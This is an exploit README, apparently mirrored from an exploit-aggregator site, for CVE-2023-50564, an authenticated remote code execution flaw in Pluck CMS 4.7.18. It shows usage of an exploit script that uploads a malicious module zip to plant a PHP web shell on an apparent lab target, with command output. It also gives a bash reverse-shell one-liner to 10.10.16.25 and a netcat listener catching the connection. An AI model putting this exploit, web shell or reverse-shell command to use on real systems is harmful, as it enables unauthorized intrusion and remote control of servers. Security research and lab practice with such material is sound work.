## https://sploitus.com/exploit?id=BC069992-9BB4-55E9-97F8-87B7C7881EBA
# CVE-2023-50564
CVE-2023-50564 is an authenticated remote code execution (RCE) vulnerability in Pluck CMS v4.7.18. The module installer (`/inc/modules_install.php`) accepts an arbitrary `.zip` upload and unpacks it under `data/modules/` without checking its contents, so an archive containing a `.php` file becomes a web shell reachable through the web root.
# Usage
Before running the exploit, the password used to authenticate on `/login.php` must be known: the module upload is only reachable after logging in.
Running the exploit against the target:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
```
The uploaded `.php` web shell can then be reached at the URL printed by the script; the `cmd` query parameter holds the command to run.
Optionally, a command can be passed with the `--cmd` flag, in which case the script runs it through the web shell and prints the output:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## Reverse Shell
Start a listener, then pass a reverse-shell one-liner with the `--cmd` flag so the web shell connects back to it:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''
```
The listener then receives the connection:
```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$
```
# Installation
Install the requirements:
```console
$ pip install -r requirements.txt
```
Help:
```console
$ python3 exploit.py --help
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]

Exploit Pluck v4.7.18 RCE Vulnerability

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL (Example: http://greenhorn.htb)
  --password PASSWORD  Pluck password
  --cmd CMD            Command to execute
```
# Credits
Credit to `Mirabbas Ağalarov` for discovering the vulnerability and publishing the original proof of concept ([Link](https://www.exploit-db.com/exploits/51592)).